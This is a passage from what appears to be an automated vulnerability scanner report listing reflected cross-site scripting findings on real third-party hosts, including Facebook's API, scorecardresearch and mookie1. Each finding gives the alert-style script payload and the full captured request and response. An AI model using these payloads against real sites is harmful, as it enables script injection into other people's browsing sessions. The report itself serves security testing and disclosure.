User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: application/json
Expires: Sun, 13 Feb 2011 17:39:13 -0800
Pragma:
X-Cnection: close
Date: Mon, 14 Feb 2011 01:38:13 GMT
Content-Length: 424

{"error_code":601,"error_msg":"Parser error: unexpected 'd807b' at position 61.","request_args":[{"key":"method","value":"fql.query"},{"key":"query","value":"SELECT name,pic_small,uid from user WHERE uid IN (1292387673)d807b<img src=a onerror=alert(1)>86106d539e46377d1"},{"key":"api_key","value":"54cc5dbde0acea15cbf544d4e434acc0"},{"key":"format","value":"JSON"},{"key":"call_id","value":"599"},{"key":"v","value":"1.0"}]}

1.84. http://api.facebook.com/restserver.php [urls parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload ec7bd<img%20src%3da%20onerror%3dalert(1)>a0b94148a55 was submitted in the urls parameter. This input was echoed as ec7bd<img src=a onerror=alert(1)>a0b94148a55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.legacy.com%2Flegacies%2F2011%2Fobituary-photo-gallery.aspx%3Fphoto%3Dbetty-garrette96f0%2522style%253d%2522x%253aexpression(alert(1))%2522520eb12a7af%26pid%3D148615818%22%5Dec7bd<img%20src%3da%20onerror%3dalert(1)>a0b94148a55&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dexaminer.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.examiner.com%252Fnational%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 13 Feb 2011 17:32:01 -0800
Pragma:
X-Cnection: close
Date: Mon, 14 Feb 2011 01:30:01 GMT
Content-Length: 482

fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/www.legacy.com\/legacies\/2011\/obituary-photo-gallery.aspx?photo=betty-garrette96f0%22style%3d%22x%3aexpression(alert(1))%22520eb12a7af&pid=148615818\"]ec7bd<img src=a onerror=alert(1)>a0b94148a55"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

1.85. http://api.js-kit.com/v1/count [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.js-kit.com
Path:   /v1/count

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload d0e85<a>179ca1bd15e was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/count?q=d0e85<a>179ca1bd15e&callback=Reuters.utils.socialCallback&appkey=prod.reuters.com HTTP/1.1
Host: api.js-kit.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Mon, 14 Feb 2011 01:36:03 GMT
Content-Length: 148
Content-Type: application/x-javascript; charset="utf-8"

Reuters.utils.socialCallback({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"d0e85<a>179ca1bd15e\" at 19" });

1.86. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 56ff7<script>alert(1)</script>c505676b722 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction56ff7<script>alert(1)</script>c505676b722&n=ar_int_p85001580&1297650567782 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:38 2011&prad=58087461&arc=40400763&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297650518%2E886%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:49 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction56ff7<script>alert(1)</script>c505676b722("");

1.87. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload a8148<script>alert(1)</script>634abd05f4d was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3a8148<script>alert(1)</script>634abd05f4d&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3a8148<script>alert(1)</script>634abd05f4d", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.88. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 1a8b2<script>alert(1)</script>16a0b4321e1 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=&c6=&c10=31476441a8b2<script>alert(1)</script>16a0b4321e1&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:40 GMT
Date: Mon, 14 Feb 2011 01:26:40 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"", c10:"31476441a8b2<script>alert(1)</script>16a0b4321e1", c15:"", c16:"", r:""});

1.89. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 7aa03<script>alert(1)</script>33d2ba5508b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12414&c5=&c6=&c10=3147644&c15=7aa03<script>alert(1)</script>33d2ba5508b HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:40 GMT
Date: Mon, 14 Feb 2011 01:26:40 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12414", c5:"", c6:"", c10:"3147644", c15:"7aa03<script>alert(1)</script>33d2ba5508b", c16:"", r:""});

1.90. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload efa2b<script>alert(1)</script>b32d71508fc was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338efa2b<script>alert(1)</script>b32d71508fc&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338efa2b<script>alert(1)</script>b32d71508fc", c3:".uy!", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.91. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 2bc3f<script>alert(1)</script>8a89c7c3d07 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!2bc3f<script>alert(1)</script>8a89c7c3d07&c4=%ECid!&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:36 GMT
Date: Mon, 14 Feb 2011 01:26:36 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!2bc3f<script>alert(1)</script>8a89c7c3d07", c4:".id!", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.92. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ecbe3<script>alert(1)</script>19cfb851d89 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!ecbe3<script>alert(1)</script>19cfb851d89&c5=57892644&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:37 GMT
Date: Mon, 14 Feb 2011 01:26:37 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!ecbe3<script>alert(1)</script>19cfb851d89", c5:"57892644", c6:"", c10:"", c15:"", c16:"", r:""});

1.93. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload d5698<script>alert(1)</script>41ad9abe9a7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644d5698<script>alert(1)</script>41ad9abe9a7&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:37 GMT
Date: Mon, 14 Feb 2011 01:26:37 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
score;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644d5698<script>alert(1)</script>41ad9abe9a7", c6:"", c10:"", c15:"", c16:"", r:""});

1.94. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload cd70e<script>alert(1)</script>b6f76d922d1 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=57892644&c6=cd70e<script>alert(1)</script>b6f76d922d1& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 21 Feb 2011 01:26:38 GMT
Date: Mon, 14 Feb 2011 01:26:38 GMT
Connection: close
Content-Length: 3596

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"57892644", c6:"cd70e<script>alert(1)</script>b6f76d922d1", c10:"", c15:"", c16:"", r:""});

1.95. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37cdc"><script>alert(1)</script>42f29418bd4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB337cdc"><script>alert(1)</script>42f29418bd4/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB337cdc"><script>alert(1)</script>42f29418bd4/FarmersBranding/2011Q1/BTRT1/728/115666934/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.96. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e176c"><script>alert(1)</script>ba946806cc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBrandinge176c"><script>alert(1)</script>ba946806cc4/2011Q1/BTRT1/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
